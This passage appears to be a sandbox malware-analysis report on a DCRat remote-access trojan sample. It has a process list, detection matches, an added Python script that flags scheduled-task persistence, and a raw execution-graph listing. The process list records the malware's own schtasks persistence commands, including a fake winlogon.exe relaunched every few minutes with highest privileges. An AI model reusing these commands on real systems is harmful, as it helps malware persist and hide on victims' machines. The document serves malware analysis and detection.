              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:29
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:30
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true
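The nine schtasks.exe invocations above (Target IDs 22 to 30) are one persistence procedure: the same two task names are re-created with /f for each dropped copy, on a minute schedule and at logon with /rl HIGHEST, and one copy borrows the name of a Windows system process. The following Python is an added triage example, not part of the Joe Sandbox report and not DCRat's code. It parses those command lines, groups them by target executable, flags the traits a hunter would look for, and replays the /f overwrites to show which task definitions actually survive. The allow-lists, the 15-minute threshold and the indicator names are this example's own assumptions; the command lines are copied from the process list.

```python
"""Triage schtasks.exe command lines for persistence indicators.
Added example, not part of the Joe Sandbox report and not DCRat's code: the sample
command lines are copied from the process list; allow-lists, thresholds and
indicator names are this example's own assumptions."""
import re
from collections import defaultdict

# Copied verbatim from the process list above (Target IDs 22 to 30).
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f''',
    r'''schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f''',
]

# Assumed allow-lists and threshold (example only; tune per environment).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_PROCESS_NAMES = {"winlogon.exe", "csrss.exe", "lsass.exe", "smss.exe", "services.exe", "svchost.exe", "wininit.exe", "dwm.exe"}
KNOWN_ROOT_DIRS = {r"c:\windows", r"c:\program files", r"c:\program files (x86)", r"c:\programdata", r"c:\users"}
MAX_RELAUNCH_MINUTES = 15
OPTIONS = {"/tn": "name", "/sc": "schedule", "/mo": "modifier", "/tr": "action", "/rl": "runlevel"}
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
EXE_RE = re.compile(r"^(.*?\.(?:exe|bat|cmd|vbs|ps1|dll))(?=\s|$)", re.I)

def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted runs (paths with spaces) intact."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]

def parse_schtasks_create(cmdline):
    """Fields of a 'schtasks /create' invocation, or None if the line is not one."""
    toks = tokenize(cmdline)
    if not toks or not re.search(r"schtasks(\.exe)?$", toks[0], re.I):
        return None
    if "/create" not in [t.lower() for t in toks]:
        return None
    task = {**dict.fromkeys(OPTIONS.values()), "force": False}
    i = 1
    while i < len(toks):
        opt = toks[i].lower()
        if opt == "/f":
            task["force"] = True
        elif opt in OPTIONS and i + 1 < len(toks):
            task[OPTIONS[opt]] = toks[i + 1]
            i += 1                      # consume the option's value too
        i += 1                          # anything else (e.g. /st 02:00) is skipped
    for key in ("schedule", "runlevel"):
        task[key] = task[key].upper() if task[key] else None
    if task["action"]:                  # schtasks allows /tr "'C:\dir\x.exe'"
        task["action"] = task["action"].strip().strip("'\"")
    return task

def executable_from_action(action):
    """Best-effort program path from a /tr action string (arguments dropped)."""
    m = EXE_RE.match(action)
    return m.group(1) if m else action.split(" ")[0]

def find_indicators(task):
    """Persistence indicators for one parsed task."""
    hits = set()
    exe = executable_from_action(task["action"]).lower()
    directory, _, base = exe.rpartition("\\")
    in_system_dir = directory in SYSTEM_DIRS
    if base in SYSTEM_PROCESS_NAMES and not in_system_dir:
        hits.add("system_name_outside_system32")       # e.g. Acrobat\winlogon.exe
    mod = task["modifier"] or ""
    if task["schedule"] == "MINUTE" and mod.isdigit() and int(mod) <= MAX_RELAUNCH_MINUTES:
        hits.add("minute_interval_relaunch")           # respawn every few minutes
    if task["schedule"] == "ONLOGON" and task["runlevel"] == "HIGHEST" and not in_system_dir:
        hits.add("highest_runlevel_on_logon")
    if re.match(r"^[a-z]:\\[^\\]+$", directory) and directory not in KNOWN_ROOT_DIRS:
        hits.add("nonstandard_root_folder")            # e.g. C:\brokermonitordhcp
    if directory.startswith(r"c:\windows\downloaded program files"):
        hits.add("downloaded_program_files")           # old IE ActiveX cache, not an app dir
    return hits

def triage(cmdlines):
    """Group /create lines by target executable, merging task names and indicators."""
    grouped = defaultdict(lambda: {"tasks": set(), "indicators": set()})
    for line in cmdlines:
        task = parse_schtasks_create(line)
        if task is None or not task["action"] or not task["name"]:
            continue
        entry = grouped[executable_from_action(task["action"])]
        entry["tasks"].add(task["name"])
        entry["indicators"] |= find_indicators(task)
    return {exe: {"tasks": sorted(v["tasks"]), "indicators": sorted(v["indicators"])}
            for exe, v in grouped.items()}

def final_task_state(cmdlines):
    """Replay the /create calls in order. Task names are case-insensitive, and with /f a
    later definition silently replaces an earlier one, so only the last one persists."""
    state = {}
    for line in cmdlines:
        task = parse_schtasks_create(line)
        if task is None or not task["name"]:
            continue
        key = task["name"].lower()
        if key in state and not task["force"]:
            continue                    # without /f schtasks refuses to overwrite
        state[key] = task
    return state
```

Running `triage(SAMPLE_CMDLINES)` yields three target executables, each with the two task names and the indicators it trips; `final_task_state(SAMPLE_CMDLINES)` shows that, because every name is re-created with /f, both HuzhgkcqwYiFfxvhdfMUs task names end up pointing at the copy under C:\Windows\Downloaded Program Files (Targets 28 to 30 overwrite Targets 22 to 24), while the winlogon and winlogonw tasks keep pointing at the Acrobat-folder winlogon.exe. On a live host the same fields come from Get-ScheduledTask (Actions, Triggers, Principal.RunLevel) rather than from command lines.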

              Target ID:31
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
              Imagebase:0x7ff757e70000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:32
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:33
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\w32tm.exe
              Wow64 process (32bit):false
              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              Imagebase:0x7ff7a0ab0000
              File size:108'032 bytes
              MD5 hash:81A82132737224D324A3E8DA993E2FB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:37
              Start time:05:37:36
              Start date:27/07/2024
              Path:C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0x440000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal
              Has exited:true


                Execution Graph

                Execution Coverage:9.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.3%
                Total number of Nodes:1488
                Total number of Limit Nodes:39
                execution_graph: [interactive call-graph rendering of 1488 nodes; the node and edge listing is not reproducible as text and is omitted]
24150->24154 24155 88b2f9 GetCommandLineW 24151->24155 24156 88b376 __vsnwprintf_l 24151->24156 24157 88b439 24152->24157 24220 8712e6 GetDlgItem ShowWindow 24154->24220 24161 88b30a 24155->24161 24159 88b381 ShellExecuteExW 24156->24159 24170 87ddd1 53 API calls 24157->24170 24158 88b203 24162 88b215 24158->24162 24163 88b20a GetLastError 24158->24163 24173 88b39e 24159->24173 24310 88ab2e SHGetMalloc 24161->24310 24166 879653 79 API calls 24162->24166 24163->24162 24164 88b4a2 SetDlgItemTextW GetDlgItem 24167 88b4bf GetWindowLongW SetWindowLongW 24164->24167 24168 88b4d7 24164->24168 24166->24120 24167->24168 24221 88bdf5 24168->24221 24169 88b326 24311 88ab2e SHGetMalloc 24169->24311 24170->24045 24186 88b3cd Sleep 24173->24186 24187 88b3e1 24173->24187 24175 88b332 24312 88ab2e SHGetMalloc 24175->24312 24176 88bdf5 98 API calls 24179 88b4f3 24176->24179 24178 88b33e 24313 87ecad 80 API calls ___scrt_fastfail 24178->24313 24246 88d0f5 24179->24246 24181 88b3f7 UnmapViewOfFile CloseHandle 24181->24132 24184 88b355 MapViewOfFile 24184->24156 24185 88bdf5 98 API calls 24190 88b519 24185->24190 24186->24173 24186->24187 24187->24132 24187->24181 24188 88b542 24314 8712c8 GetDlgItem EnableWindow 24188->24314 24190->24188 24192 88bdf5 98 API calls 24190->24192 24191->24045 24191->24067 24192->24188 24194 871314 24193->24194 24195 87136d 24193->24195 24196 87137a 24194->24196 24319 87da98 62 API calls 2 library calls 24194->24319 24320 87da71 GetWindowLongW SetWindowLongW 24195->24320 24196->24034 24196->24035 24196->24097 24199 871336 24199->24196 24200 871349 GetDlgItem 24199->24200 24200->24196 24201 871359 24200->24201 24201->24196 24202 87135f SetWindowTextW 24201->24202 24202->24196 24206 87a059 24203->24206 24204 87a0ea 24205 87a207 9 API calls 24204->24205 24207 87a113 24204->24207 24205->24207 24206->24204 24206->24207 24321 87a207 24206->24321 24207->24099 24207->24100 24209->24109 24211 879728 24210->24211 24212 879792 CreateFileW 24211->24212 24213 879786 
24211->24213 24212->24213 24214 8797e4 24213->24214 24215 87b66c 2 API calls 24213->24215 24214->24158 24216 8797cb 24215->24216 24216->24214 24217 8797cf CreateFileW 24216->24217 24217->24214 24218->24137 24219->24147 24220->24164 24222 88bdff __EH_prolog 24221->24222 24223 88b4e5 24222->24223 24224 88aa36 ExpandEnvironmentStringsW 24222->24224 24223->24176 24230 88be36 _wcsrchr 24224->24230 24226 88aa36 ExpandEnvironmentStringsW 24226->24230 24227 88c11d SetWindowTextW 24227->24230 24230->24223 24230->24226 24230->24227 24231 8935de 22 API calls 24230->24231 24233 88bf0b SetFileAttributesW 24230->24233 24238 88c2e7 GetDlgItem SetWindowTextW SendMessageW 24230->24238 24241 88c327 SendMessageW 24230->24241 24342 8817ac CompareStringW 24230->24342 24343 889da4 GetCurrentDirectoryW 24230->24343 24345 87a52a 7 API calls 24230->24345 24346 87a4b3 FindClose 24230->24346 24347 88ab9a 76 API calls ___std_exception_copy 24230->24347 24231->24230 24234 88bfc5 GetFileAttributesW 24233->24234 24245 88bf25 ___scrt_fastfail 24233->24245 24234->24230 24237 88bfd7 DeleteFileW 24234->24237 24237->24230 24239 88bfe8 24237->24239 24238->24230 24240 87400a _swprintf 51 API calls 24239->24240 24242 88c008 GetFileAttributesW 24240->24242 24241->24230 24242->24239 24243 88c01d MoveFileW 24242->24243 24243->24230 24244 88c035 MoveFileExW 24243->24244 24244->24230 24245->24230 24245->24234 24344 87b4f7 52 API calls 2 library calls 24245->24344 24247 88d0ff __EH_prolog 24246->24247 24348 87fead 24247->24348 24249 88d130 24352 875c59 24249->24352 24251 88d14e 24356 877c68 24251->24356 24255 88d1a1 24373 877cfb 24255->24373 24257 88b504 24257->24185 24259 88cd38 24258->24259 24260 889d1a 4 API calls 24259->24260 24261 88cd3d 24260->24261 24262 88cd45 GetWindow 24261->24262 24263 88b5d1 24261->24263 24262->24263 24266 88cd65 24262->24266 24263->24042 24263->24043 24264 88cd72 GetClassNameW 24817 8817ac CompareStringW 24264->24817 24266->24263 24266->24264 24267 88cdfa GetWindow 24266->24267 
24268 88cd96 GetWindowLongW 24266->24268 24267->24263 24267->24266 24268->24267 24269 88cda6 SendMessageW 24268->24269 24269->24267 24270 88cdbc GetObjectW 24269->24270 24818 889d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24270->24818 24272 88cdd3 24819 889d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24272->24819 24820 889f5d 8 API calls ___scrt_fastfail 24272->24820 24275 88cde4 SendMessageW DeleteObject 24275->24267 24276->24054 24278 88a2e8 24277->24278 24279 88a30d 24277->24279 24821 8817ac CompareStringW 24278->24821 24281 88a31b 24279->24281 24282 88a312 SHAutoComplete 24279->24282 24285 88a7c3 24281->24285 24282->24281 24283 88a2fb 24283->24279 24284 88a2ff FindWindowExW 24283->24284 24284->24279 24286 88a7cd __EH_prolog 24285->24286 24287 871380 82 API calls 24286->24287 24288 88a7ef 24287->24288 24822 871f4f 24288->24822 24291 88a818 24293 871951 126 API calls 24291->24293 24292 88a809 24294 871631 84 API calls 24292->24294 24296 88a83a __vsnwprintf_l ___std_exception_copy 24293->24296 24295 88a814 24294->24295 24295->24083 24295->24088 24296->24295 24297 871631 84 API calls 24296->24297 24297->24295 24298->24066 24830 88ac74 PeekMessageW 24299->24830 24302 88cb88 24306 88cb93 ShowWindow SendMessageW SendMessageW 24302->24306 24303 88cbbc SendMessageW SendMessageW 24304 88cbf8 24303->24304 24305 88cc17 SendMessageW SendMessageW SendMessageW 24303->24305 24304->24305 24307 88cc4a SendMessageW 24305->24307 24308 88cc6d SendMessageW 24305->24308 24306->24303 24307->24308 24308->24086 24309->24144 24310->24169 24311->24175 24312->24178 24313->24184 24314->24191 24315->24122 24316->24140 24317->24118 24318->24108 24319->24199 24320->24196 24322 87a214 24321->24322 24323 87a238 24322->24323 24325 87a22b CreateDirectoryW 24322->24325 24324 87a180 4 API calls 24323->24324 24326 87a23e 24324->24326 24325->24323 24327 87a26b 24325->24327 24328 87a27e GetLastError 24326->24328 24329 87b66c 2 API calls 24326->24329 24331 87a27a 24327->24331 24334 87a444 
24327->24334 24328->24331 24332 87a254 24329->24332 24331->24206 24332->24328 24333 87a258 CreateDirectoryW 24332->24333 24333->24327 24333->24328 24335 88e360 24334->24335 24336 87a451 SetFileAttributesW 24335->24336 24337 87a467 24336->24337 24338 87a494 24336->24338 24339 87b66c 2 API calls 24337->24339 24338->24331 24340 87a47b 24339->24340 24340->24338 24341 87a47f SetFileAttributesW 24340->24341 24341->24338 24342->24230 24343->24230 24344->24245 24345->24230 24346->24230 24347->24230 24349 87feba 24348->24349 24377 871789 24349->24377 24351 87fed2 24351->24249 24353 87fead 24352->24353 24354 871789 76 API calls 24353->24354 24355 87fed2 24354->24355 24355->24251 24357 877c72 __EH_prolog 24356->24357 24394 87c827 24357->24394 24359 877c8d 24360 88e24a new 8 API calls 24359->24360 24361 877cb7 24360->24361 24400 88440b 24361->24400 24364 877ddf 24365 877de9 24364->24365 24370 877e53 24365->24370 24429 87a4c6 24365->24429 24367 877f06 24367->24255 24368 877ec4 24368->24367 24435 876dc1 74 API calls 24368->24435 24370->24368 24372 87a4c6 8 API calls 24370->24372 24407 87837f 24370->24407 24372->24370 24374 877d09 24373->24374 24376 877d10 24373->24376 24375 881acf 84 API calls 24374->24375 24375->24376 24378 87179f 24377->24378 24389 8717fa __vsnwprintf_l 24377->24389 24379 8717c8 24378->24379 24390 876e91 74 API calls __vswprintf_c_l 24378->24390 24380 871827 24379->24380 24384 8717e7 ___std_exception_copy 24379->24384 24382 8935de 22 API calls 24380->24382 24386 87182e 24382->24386 24383 8717be 24391 876efd 75 API calls 24383->24391 24384->24389 24392 876efd 75 API calls 24384->24392 24386->24389 24393 876efd 75 API calls 24386->24393 24389->24351 24390->24383 24391->24379 24392->24389 24393->24389 24395 87c831 __EH_prolog 24394->24395 24396 88e24a new 8 API calls 24395->24396 24397 87c874 24396->24397 24398 88e24a new 8 API calls 24397->24398 24399 87c898 24398->24399 24399->24359 24401 884415 __EH_prolog 24400->24401 24402 88e24a new 8 API calls 24401->24402 
24403 884431 24402->24403 24404 877ce6 24403->24404 24406 8806ba 78 API calls 24403->24406 24404->24364 24406->24404 24408 878389 __EH_prolog 24407->24408 24436 871380 24408->24436 24410 8783a4 24444 879ef7 24410->24444 24415 8783cf 24417 8783d3 24415->24417 24426 87a4c6 8 API calls 24415->24426 24428 87846e 24415->24428 24571 87bac4 CompareStringW 24415->24571 24567 871631 24417->24567 24421 8784ce 24470 871f00 24421->24470 24424 8784d9 24424->24417 24474 873aac 24424->24474 24484 87857b 24424->24484 24426->24415 24463 878517 24428->24463 24430 87a4db 24429->24430 24434 87a4df 24430->24434 24805 87a5f4 24430->24805 24432 87a4ef 24433 87a4f4 FindClose 24432->24433 24432->24434 24433->24434 24434->24365 24435->24367 24437 871385 __EH_prolog 24436->24437 24438 87c827 8 API calls 24437->24438 24439 8713bd 24438->24439 24440 88e24a new 8 API calls 24439->24440 24443 871416 ___scrt_fastfail 24439->24443 24441 871403 24440->24441 24442 87b07d 82 API calls 24441->24442 24441->24443 24442->24443 24443->24410 24445 879f0e 24444->24445 24446 8783ba 24445->24446 24572 876f5d 76 API calls 24445->24572 24446->24417 24448 8719a6 24446->24448 24449 8719b0 __EH_prolog 24448->24449 24459 871a00 24449->24459 24461 8719e5 24449->24461 24573 87709d 24449->24573 24451 871b50 24576 876dc1 74 API calls 24451->24576 24453 873aac 97 API calls 24457 871bb3 24453->24457 24454 871b60 24454->24453 24454->24461 24455 871bff 24455->24461 24462 871c32 24455->24462 24577 876dc1 74 API calls 24455->24577 24457->24455 24458 873aac 97 API calls 24457->24458 24458->24457 24459->24451 24459->24454 24459->24461 24460 873aac 97 API calls 24460->24462 24461->24415 24462->24460 24462->24461 24464 878524 24463->24464 24595 880c26 GetSystemTime SystemTimeToFileTime 24464->24595 24466 878488 24466->24421 24467 881359 24466->24467 24597 88d51a 24467->24597 24472 871f05 __EH_prolog 24470->24472 24471 871f39 24471->24424 24472->24471 24605 871951 24472->24605 24475 873abc 24474->24475 24476 873ab8 24474->24476 
24477 873af7 24475->24477 24478 873ae9 24475->24478 24476->24424 24740 8727e8 97 API calls 3 library calls 24477->24740 24480 873b29 24478->24480 24739 873281 85 API calls 3 library calls 24478->24739 24480->24424 24482 873af5 24482->24480 24741 87204e 74 API calls 24482->24741 24485 878585 __EH_prolog 24484->24485 24486 8785be 24485->24486 24498 8785c2 24485->24498 24764 8884bd 99 API calls 24485->24764 24487 8785e7 24486->24487 24491 87867a 24486->24491 24486->24498 24488 878609 24487->24488 24487->24498 24765 877b66 151 API calls 24487->24765 24488->24498 24766 8884bd 99 API calls 24488->24766 24491->24498 24742 875e3a 24491->24742 24494 878705 24494->24498 24748 87826a 24494->24748 24497 878875 24499 87a4c6 8 API calls 24497->24499 24500 8788e0 24497->24500 24498->24424 24499->24500 24752 877d6c 24500->24752 24502 87c991 80 API calls 24505 87893b _memcmp 24502->24505 24503 878a70 24504 878b43 24503->24504 24512 878abf 24503->24512 24509 878b9e 24504->24509 24517 878b4e 24504->24517 24505->24498 24505->24502 24505->24503 24506 878a69 24505->24506 24767 878236 82 API calls 24505->24767 24768 871f94 74 API calls 24505->24768 24769 871f94 74 API calls 24506->24769 24510 878b30 24509->24510 24772 8780ea 96 API calls 24509->24772 24511 878c09 24510->24511 24518 878b9c 24510->24518 24520 879989 GetFileType 24511->24520 24530 878c74 24511->24530 24558 8791c1 __except_handler4 24511->24558 24512->24510 24515 87a180 4 API calls 24512->24515 24513 879653 79 API calls 24513->24498 24514 879653 79 API calls 24514->24498 24519 878af7 24515->24519 24517->24518 24771 877f26 100 API calls __except_handler4 24517->24771 24518->24514 24519->24510 24770 879377 96 API calls 24519->24770 24522 878c4c 24520->24522 24521 87aa88 8 API calls 24524 878cc3 24521->24524 24522->24530 24773 871f94 74 API calls 24522->24773 24526 87aa88 8 API calls 24524->24526 24545 878cd9 24526->24545 24528 878c62 24774 877061 75 API calls 24528->24774 24530->24521 24531 878d9c 24532 878df7 24531->24532 
24533 878efd 24531->24533 24534 878e69 24532->24534 24537 878e07 24532->24537 24535 878f23 24533->24535 24536 878f0f 24533->24536 24555 878e27 24533->24555 24538 87826a CharUpperW 24534->24538 24540 882c42 75 API calls 24535->24540 24539 8792e6 121 API calls 24536->24539 24541 878e4d 24537->24541 24546 878e15 24537->24546 24542 878e84 24538->24542 24539->24555 24544 878f3c 24540->24544 24541->24555 24777 877907 108 API calls 24541->24777 24550 878eb4 24542->24550 24551 878ead 24542->24551 24542->24555 24780 8828f1 121 API calls 24544->24780 24545->24531 24775 879b21 SetFilePointer GetLastError SetEndOfFile 24545->24775 24776 871f94 74 API calls 24546->24776 24779 879224 94 API calls __EH_prolog 24550->24779 24778 877698 84 API calls __except_handler4 24551->24778 24557 87904b 24555->24557 24781 871f94 74 API calls 24555->24781 24556 879156 24556->24558 24560 87a444 4 API calls 24556->24560 24557->24556 24557->24558 24559 879104 24557->24559 24758 879ebf SetEndOfFile 24557->24758 24558->24513 24759 879d62 24559->24759 24561 8791b1 24560->24561 24561->24558 24782 871f94 74 API calls 24561->24782 24564 87914b 24565 8796d0 75 API calls 24564->24565 24565->24556 24568 871643 24567->24568 24797 87c8ca 24568->24797 24571->24415 24572->24446 24578 8716d2 24573->24578 24575 8770b9 24575->24459 24576->24461 24577->24462 24579 8716e8 24578->24579 24590 871740 __vsnwprintf_l 24578->24590 24580 871711 24579->24580 24591 876e91 74 API calls __vswprintf_c_l 24579->24591 24582 871767 24580->24582 24587 87172d ___std_exception_copy 24580->24587 24584 8935de 22 API calls 24582->24584 24583 871707 24592 876efd 75 API calls 24583->24592 24586 87176e 24584->24586 24586->24590 24594 876efd 75 API calls 24586->24594 24587->24590 24593 876efd 75 API calls 24587->24593 24590->24575 24591->24583 24592->24580 24593->24590 24594->24590 24596 880c56 __vsnwprintf_l 24595->24596 24596->24466 24598 88d527 24597->24598 24599 87ddd1 53 API calls 24598->24599 24600 88d54a 24599->24600 24601 87400a 
_swprintf 51 API calls 24600->24601 24602 88d55c 24601->24602 24603 88cb5a 16 API calls 24602->24603 24604 881372 24603->24604 24604->24421 24606 871961 24605->24606 24608 87195d 24605->24608 24609 871896 24606->24609 24608->24471 24610 8718a8 24609->24610 24611 8718e5 24609->24611 24612 873aac 97 API calls 24610->24612 24617 873f18 24611->24617 24616 8718c8 24612->24616 24616->24608 24620 873f21 24617->24620 24618 873aac 97 API calls 24618->24620 24619 871906 24619->24616 24622 871e00 24619->24622 24620->24618 24620->24619 24634 88067c 24620->24634 24623 871e0a __EH_prolog 24622->24623 24642 873b3d 24623->24642 24625 871e34 24626 871ebb 24625->24626 24627 8716d2 76 API calls 24625->24627 24626->24616 24628 871e4b 24627->24628 24670 871849 76 API calls 24628->24670 24630 871e63 24632 871e6f 24630->24632 24671 88137a MultiByteToWideChar 24630->24671 24672 871849 76 API calls 24632->24672 24635 880683 24634->24635 24636 88069e 24635->24636 24640 876e8c RaiseException Concurrency::cancel_current_task 24635->24640 24638 8806af SetThreadExecutionState 24636->24638 24641 876e8c RaiseException Concurrency::cancel_current_task 24636->24641 24638->24620 24640->24636 24641->24638 24643 873b47 __EH_prolog 24642->24643 24644 873b5d 24643->24644 24645 873b79 24643->24645 24701 876dc1 74 API calls 24644->24701 24647 873dc2 24645->24647 24650 873ba5 24645->24650 24718 876dc1 74 API calls 24647->24718 24649 873b68 24649->24625 24650->24649 24673 882c42 24650->24673 24652 873c26 24653 873cb1 24652->24653 24669 873c1d 24652->24669 24704 87c991 24652->24704 24686 87aa88 24653->24686 24654 873c22 24654->24652 24703 872034 76 API calls 24654->24703 24656 873bf4 24656->24652 24656->24654 24657 873c12 24656->24657 24702 876dc1 74 API calls 24657->24702 24660 873cc4 24663 873d3e 24660->24663 24664 873d48 24660->24664 24690 8792e6 24663->24690 24710 8828f1 121 API calls 24664->24710 24667 873d46 24667->24669 24711 871f94 74 API calls 24667->24711 24712 881acf 24669->24712 24670->24630 
24671->24632 24672->24626 24674 882c51 24673->24674 24676 882c5b 24673->24676 24719 876efd 75 API calls 24674->24719 24677 882ca2 ___std_exception_copy 24676->24677 24680 882c9d Concurrency::cancel_current_task 24676->24680 24685 882cfd ___scrt_fastfail 24676->24685 24678 882da9 Concurrency::cancel_current_task 24677->24678 24679 882cd9 24677->24679 24677->24685 24722 89157a RaiseException 24678->24722 24720 882b7b 75 API calls 3 library calls 24679->24720 24721 89157a RaiseException 24680->24721 24684 882dc1 24685->24656 24687 87aa95 24686->24687 24689 87aa9f 24686->24689 24688 88e24a new 8 API calls 24687->24688 24688->24689 24689->24660 24691 8792f0 __EH_prolog 24690->24691 24723 877dc6 24691->24723 24694 87709d 76 API calls 24695 879302 24694->24695 24726 87ca6c 24695->24726 24697 87935c 24697->24667 24698 879314 24698->24697 24700 87ca6c 114 API calls 24698->24700 24735 87cc51 97 API calls __vsnwprintf_l 24698->24735 24700->24698 24701->24649 24702->24669 24703->24652 24705 87c9c4 24704->24705 24706 87c9b2 24704->24706 24737 876249 80 API calls 24705->24737 24736 876249 80 API calls 24706->24736 24709 87c9bc 24709->24653 24710->24667 24711->24669 24713 881ad9 24712->24713 24714 881af2 24713->24714 24717 881b06 24713->24717 24738 88075b 84 API calls 24714->24738 24716 881af9 24716->24717 24718->24649 24719->24676 24720->24685 24721->24678 24722->24684 24724 87acf5 GetVersionExW 24723->24724 24725 877dcb 24724->24725 24725->24694 24732 87ca82 __vsnwprintf_l 24726->24732 24727 87cbf7 24728 87cc1f 24727->24728 24729 87ca0b 6 API calls 24727->24729 24730 88067c SetThreadExecutionState RaiseException 24728->24730 24729->24728 24733 87cbee 24730->24733 24731 8884bd 99 API calls 24731->24732 24732->24727 24732->24731 24732->24733 24734 87ab70 89 API calls 24732->24734 24733->24698 24734->24732 24735->24698 24736->24709 24737->24709 24738->24716 24739->24482 24740->24482 24741->24480 24743 875e4a 24742->24743 24783 875d67 24743->24783 24746 875e7d 24747 875eb5 
24746->24747 24788 87ad65 CharUpperW CompareStringW 24746->24788 24747->24494 24749 878289 24748->24749 24794 88179d CharUpperW 24749->24794 24751 878333 24751->24497 24753 877d7b 24752->24753 24754 877dbb 24753->24754 24795 877043 74 API calls 24753->24795 24754->24505 24756 877db3 24796 876dc1 74 API calls 24756->24796 24758->24559 24760 879d73 24759->24760 24763 879d82 24759->24763 24761 879d79 FlushFileBuffers 24760->24761 24760->24763 24761->24763 24762 879dfb SetFileTime 24762->24564 24763->24762 24764->24486 24765->24488 24766->24498 24767->24505 24768->24505 24769->24503 24770->24510 24771->24518 24772->24510 24773->24528 24774->24530 24775->24531 24776->24555 24777->24555 24778->24555 24779->24555 24780->24555 24781->24557 24782->24558 24789 875c64 24783->24789 24785 875d88 24785->24746 24787 875c64 2 API calls 24787->24785 24788->24746 24792 875c6e 24789->24792 24790 875d56 24790->24785 24790->24787 24792->24790 24793 87ad65 CharUpperW CompareStringW 24792->24793 24793->24792 24794->24751 24795->24756 24796->24754 24798 